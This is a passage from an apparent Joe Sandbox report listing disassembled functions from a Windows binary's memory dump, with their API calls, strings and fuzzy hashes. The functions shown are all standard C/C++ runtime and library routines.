Opcode Fuzzy Hash: 525d76add16e0edf7bfd340d266b85f4cd55da89ccd0f17837c310c2fe9bd161
Instruction Fuzzy Hash: 2F616FB1E003999FDB10DFA9D945BEEBBF4AF44310F194069E805B7341EB34A949CBA1

Function 00E138E6 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E13A05
___TypeMatch.LIBVCRUNTIME ref: 00E13B13
CatchIt.LIBVCRUNTIME ref: 00E13B64
_UnwindNestedFrames.LIBCMT ref: 00E13C65
CallUnexpected.LIBVCRUNTIME ref: 00E13C80

Strings

csm, xrefs: 00E13923
csm, xrefs: 00E13990
csm, xrefs: 00E13A3C

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 603f2ca15691f4481b364b0665ac316e8a530deda131cc01fff4b2d1d28d1574
Instruction ID: 9e6cebc305c8b068dc883001ccb6fb91adb1896c81458fd106d03aca969f361f
Opcode Fuzzy Hash: 603f2ca15691f4481b364b0665ac316e8a530deda131cc01fff4b2d1d28d1574
Instruction Fuzzy Hash: 29B157B1800209EFCF29DFA4C8819EEBBB5EF14314F14615AE8157B216D371DB91CBA1

Function 00E03D18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

TZ, xrefs: 00E03DE0
Z, xrefs: 00E03DE7

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID: Z$TZ
API String ID: 0-1778100189
Opcode ID: 45874b85027c36f42189f98772096b60268d0851178a346851f1aaa1d20dbcac
Instruction ID: 80e97d1eb23520395f5be5782fce6c565a0c3e1a2495666c4c80f9521f28c82e
Opcode Fuzzy Hash: 45874b85027c36f42189f98772096b60268d0851178a346851f1aaa1d20dbcac
Instruction Fuzzy Hash: 0041BB76A00745AFD7249F78CC46BAABBEDFB88710F10562AF111FB2C1D6719A818790

Function 00E11260 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E11297
___except_validate_context_record.LIBVCRUNTIME ref: 00E1129F
_ValidateLocalCookies.LIBCMT ref: 00E11328
__IsNonwritableInCurrentImage.LIBCMT ref: 00E11353
_ValidateLocalCookies.LIBCMT ref: 00E113A8

Strings

csm, xrefs: 00E1133D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5258b94dcd9fd842bca3113b4cf75ec7ac38a431a3193bca2bad11fa5fcabc37
Instruction ID: 8820eef37985dfbfe186822c9a8355437cb90336dad39e6d52b2770d288e1a26
Opcode Fuzzy Hash: 5258b94dcd9fd842bca3113b4cf75ec7ac38a431a3193bca2bad11fa5fcabc37
Instruction Fuzzy Hash: 2A41E434A00208AFCF10DF68C884ADEBBF5BF05318F149195EA25BB396C7319985CB91

Function 00E0F774 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E37D34,?,?,00DDF72D,00E38A78,?,?,?), ref: 00E0F77E
LeaveCriticalSection.KERNEL32(00E37D34,?,?,00DDF72D,00E38A78,?,?,?), ref: 00E0F7B1
RtlWakeAllConditionVariable.NTDLL ref: 00E0F828
SetEvent.KERNEL32(?,00DDF72D,00E38A78,?,?,?), ref: 00E0F832
ResetEvent.KERNEL32(?,00DDF72D,00E38A78,?,?,?), ref: 00E0F83E

Strings

4}, xrefs: 00E0F778

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID: 4}
API String ID: 3916383385-2145745857
Opcode ID: c8d392669ee02111da892231b809952a608fe62fe12a79e5d3ee36b8ab4712df
Instruction ID: 004e3e7a45a0613a09c4cbcece65d2b9de6fbf0dbdfacdedb8e4980b4bb61345
Opcode Fuzzy Hash: c8d392669ee02111da892231b809952a608fe62fe12a79e5d3ee36b8ab4712df
Instruction Fuzzy Hash: 26014B71515218DFC7249F26FC0C9A43FA5FF0A7107018865E942B3662CB301815DB90

Function 00E15A1E Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15A67
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15AD2
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15AEF
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15B2E
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15B8D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,00E2BB63,00000000,?,bad locale name), ref: 00E15BB0

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: a0a4d4ac9afc91ac4d6f7d2c58b97b53085764df973f11cb8d1697decb4755e8
Instruction ID: b4d7c33a8fdadbd94882a3f1226b18e7bacc8ec97f64ab78a1e3960e1aa363c7
Opcode Fuzzy Hash: a0a4d4ac9afc91ac4d6f7d2c58b97b53085764df973f11cb8d1697decb4755e8
Instruction Fuzzy Hash: C151BB73A0460AEFEF209FA0CC45FEA7BA9EF80754F105529F915B6190D7758C90CBA0

Function 00DEAB80 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DEABB6
std::_Lockit::_Lockit.LIBCPMT ref: 00DEABD9
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEABF9
std::_Facet_Register.LIBCPMT ref: 00DEAC6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEAC83
Concurrency::cancel_current_task.LIBCPMT ref: 00DEACA6

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: bc4db5cfe4d4e3fde1d381e77a8f9e1ead51bde56007260a4613ac098de15275
Instruction ID: 2655125b628ef3e8e09012bf3dea2196008b20b2a3adba18f3a6e8c658c157ca
Opcode Fuzzy Hash: bc4db5cfe4d4e3fde1d381e77a8f9e1ead51bde56007260a4613ac098de15275
Instruction Fuzzy Hash: 0C41C27590025A9FCF11EF59D945AAEBBB0FB44320F29421AE81677391DB30BD44CBA1

Function 00DDCF40 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DDCF76
std::_Lockit::_Lockit.LIBCPMT ref: 00DDCF99
std::_Lockit::~_Lockit.LIBCPMT ref: 00DDCFB9
std::_Facet_Register.LIBCPMT ref: 00DDD02B
std::_Lockit::~_Lockit.LIBCPMT ref: 00DDD043
Concurrency::cancel_current_task.LIBCPMT ref: 00DDD066

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e6512fdaff7310f70a5f76bf5bfd5e9fada69681495ca9318745d2a84ecd0ddd
Instruction ID: c987780814c0287291399e10a32a143898cb7faac35d85375bddadae50317e98
Opcode Fuzzy Hash: e6512fdaff7310f70a5f76bf5bfd5e9fada69681495ca9318745d2a84ecd0ddd
Instruction Fuzzy Hash: 6D41AD7190061ADFCF11DF94D945AAEBBB5FB44720F24425AE805B7391EB30AD45CBE0

Function 00E13578 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E1356F,00E111E3,00E10093), ref: 00E13586
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E13594
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E135AD
SetLastError.KERNEL32(00000000,00E1356F,00E111E3,00E10093), ref: 00E135FF

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a3f8b01da1f7e0c4fb110e4165b3fd08dca96b151992fe33dac10139eddafb20
Instruction ID: 1c06bf2a4b4eb2f669a5aa0988c36c22c4d2ee390e72e6c630fdaa9e3d9ffa5d
Opcode Fuzzy Hash: a3f8b01da1f7e0c4fb110e4165b3fd08dca96b151992fe33dac10139eddafb20
Instruction Fuzzy Hash: CB014C362083167FA6252B767C4A9EB2F9BFB01B7D320622DF615701F1EF114D886114

Function 00DDE570 Relevance: 9.0, APIs: 6, Instructions: 39COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00DDE5BC
EnterCriticalSection.KERNEL32(00000004,?,?,00DDE54B), ref: 00DDE5CF
EnterCriticalSection.KERNEL32(00000004,?,?,?,?,?,00DDE54B), ref: 00DDE5DC
GdiplusShutdown.GDIPLUS(00000000,?,?,?,?,?,00DDE54B), ref: 00DDE5E9
LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,00DDE54B), ref: 00DDE5F6
LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,00DDE54B), ref: 00DDE5FD

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: 292becd8917c4dd57f6bf570a070102adfe925fc808f8f4a18343473facb4964
Instruction ID: e82f16736b4bc7ab9eab35d248eee9004e7031bbf4b5da7606ed63165e9276d0
Opcode Fuzzy Hash: 292becd8917c4dd57f6bf570a070102adfe925fc808f8f4a18343473facb4964
Instruction Fuzzy Hash: 31010871000300DFE721AF25E90CB167BB4AF45769F248A4DE1659E2D2C77AC50BDFA0

Function 00DD8F90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DD9013
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DD905F
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DD9094
std::_Lockit::~_Lockit.LIBCPMT ref: 00DD9129

Strings

bad locale name, xrefs: 00DD9147

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1143662833-1405518554
Opcode ID: 4427d27e2bacdca5c5c6ac65564f83d85d7be41afba84900f292d4b93391770e
Instruction ID: e913ab79e9e92c9a390a3c26d26711589021d352abd19ee63bb54a7462a25e5d
Opcode Fuzzy Hash: 4427d27e2bacdca5c5c6ac65564f83d85d7be41afba84900f292d4b93391770e
Instruction Fuzzy Hash: D55172B1D043499BDF10DFA4D845BEEFBB8AF14300F18416AE908B7381E775AA45CBA1

Function 00E00EEF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AA85FA48,?,?,00000000,00E19730,000000FF,?,00E00E7F,00000002,?,00E00E53,00DFCEF2), ref: 00E00F24
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E00F36
FreeLibrary.KERNEL32(00000000,?,?,00000000,00E19730,000000FF,?,00E00E7F,00000002,?,00E00E53,00DFCEF2), ref: 00E00F58

Strings

mscoree.dll, xrefs: 00E00F1D
CorExitProcess, xrefs: 00E00F2E

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 89c4d449fd3d45dc4a5f6734a37809f63c0d01d2e0ebd7320645f300dc109d7c
Instruction ID: 58e90fed9e629582eca2f0f5494fda59ec212bca10bd045004a2973fa61c0ab9
Opcode Fuzzy Hash: 89c4d449fd3d45dc4a5f6734a37809f63c0d01d2e0ebd7320645f300dc109d7c
Instruction Fuzzy Hash: 1301DB31614619FFDB318F51DC05FAEBBB8FB04B14F004525F915B22D0DB759905CA50

Function 00E0F846 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00E0F7E3,00000064), ref: 00E0F869
LeaveCriticalSection.KERNEL32(00E37D34,00000000,?,00E0F7E3,00000064,?,?,00DDF4B3,00E38A7C,AA85FA48,00000000,?), ref: 00E0F873
WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,00E0F7E3,00000064,?,?,00DDF4B3,00E38A7C,AA85FA48,00000000,?), ref: 00E0F884
EnterCriticalSection.KERNEL32(00E37D34,?,00E0F7E3,00000064,?,?,00DDF4B3,00E38A7C,AA85FA48,00000000,?), ref: 00E0F88B

Strings

4}, xrefs: 00E0F86D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: 4}
API String ID: 3269011525-2145745857
Opcode ID: 6840b9b6a599110716cecde5d08baeecd2e6a13aa4f94d48d9fbe2b3fe36cdb7
Instruction ID: 35d657837dab34929cd332b8dc193dd39081f075f8f0d0000a8db5070d06b292
Opcode Fuzzy Hash: 6840b9b6a599110716cecde5d08baeecd2e6a13aa4f94d48d9fbe2b3fe36cdb7
Instruction Fuzzy Hash: 7AE0923250A228EFDB311B52EC0CEB93F29BF0AB50F405421F989761A18A714815DBD0

Function 00E151DE Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E151E5
std::_Lockit::_Lockit.LIBCPMT ref: 00E151F0
std::_Lockit::~_Lockit.LIBCPMT ref: 00E1525E

Part of subcall function 00E15340: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E15358

std::locale::_Setgloballocale.LIBCPMT ref: 00E1520B
_Yarn.LIBCPMT ref: 00E15221

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 02e646e07b3b465678e9701217c427bab0d418e9d0211033875ce0fff5024178
Instruction ID: f984b3c5aa12b29b64470d3b01e410c86efa67640723563f5ba152dbd9ccb299
Opcode Fuzzy Hash: 02e646e07b3b465678e9701217c427bab0d418e9d0211033875ce0fff5024178
Instruction Fuzzy Hash: E7019EB2600A14DFC706EB2098555BD7BB5BFC4340B142009E812773A2CF746A86CBD1

Function 00DC7720 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 479COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00DC7B4E
___std_exception_destroy.LIBVCRUNTIME ref: 00DC7C67

Strings

", ", xrefs: 00DC790E, 00DC7927
: ", xrefs: 00DC78A4, 00DC78BE

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: ", "$: "
API String ID: 4194217158-747220369
Opcode ID: 039f67355c3f0968f9b09bbd2afbe7ecf90a5b0dec570c677b2298b93f154d0f
Instruction ID: 439bca687ba3604e5cdfedc592565b97902890071df46e8e98f6710a1da72fbd
Opcode Fuzzy Hash: 039f67355c3f0968f9b09bbd2afbe7ecf90a5b0dec570c677b2298b93f154d0f
Instruction Fuzzy Hash: C6F1FE70A002059FDB18CF68CC99B6EBBF6FF84300F18462DE45697B91D774A990CBA5

Function 00E05663 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00E057E3
__freea.LIBCMT ref: 00E057FF

Strings

a/p, xrefs: 00E058C7
am/pm, xrefs: 00E05863

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: c3e4928f3b491c0b2297703ad20943013d9469f869cf5943ec4e048b00c70188
Instruction ID: 2b8404332445d927297a30920576a6e90653724909c7d263c0bdafa7e7cc3d47
Opcode Fuzzy Hash: c3e4928f3b491c0b2297703ad20943013d9469f869cf5943ec4e048b00c70188
Instruction Fuzzy Hash: 80C1E636A00A16DADB248F68C885ABB77B0FF55708F28A15AE501BB2D0D3359CC1DF61

Function 00DDE060 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00DDE2E1
___std_exception_destroy.LIBVCRUNTIME ref: 00DDE2F0

Strings

at line , xrefs: 00DDE1B1, 00DDE1C7
, column , xrefs: 00DDE206, 00DDE21C

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 47de2109d10fd10af43d4762999217b6a428b2659d5bc07205e5134ef94875a9
Instruction ID: ad65cd4aacfd6ad9a976120d85427badd617e5378e79682b48c0be346f0dfecb
Opcode Fuzzy Hash: 47de2109d10fd10af43d4762999217b6a428b2659d5bc07205e5134ef94875a9
Instruction Fuzzy Hash: 5281D671A002099FD718DF68CC45B9EFBF9FF85300F14451AE815AB782E770A985CBA5

Function 00E13C8B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00E13CB0
CatchIt.LIBVCRUNTIME ref: 00E13D96

Strings

RCC, xrefs: 00E13CCA
MOC, xrefs: 00E13CC2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 8c29dc78bcc99507835748eb0f9da020e6a1d617a2291ca4685886dd40ba702c
Instruction ID: a6bb873326cb1b0f58019546fcf14d41e78e036d4ce32994f750d53b1137791a
Opcode Fuzzy Hash: 8c29dc78bcc99507835748eb0f9da020e6a1d617a2291ca4685886dd40ba702c
Instruction Fuzzy Hash: FB414871900209AFCF15DFA8DD81AEEBBB5FF48308F149059FA1577251D3359A90DB90

Function 00DD93D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00DD946F

Part of subcall function 00E134A6: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00E14DCB,?,00E33F20,?,?,?), ref: 00E13506

Strings

ios_base::failbit set, xrefs: 00DD9308, 00DD9411
ios_base::eofbit set, xrefs: 00DD9416
ios_base::badbit set, xrefs: 00DD9407, 00DD9432, 00DD9453

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
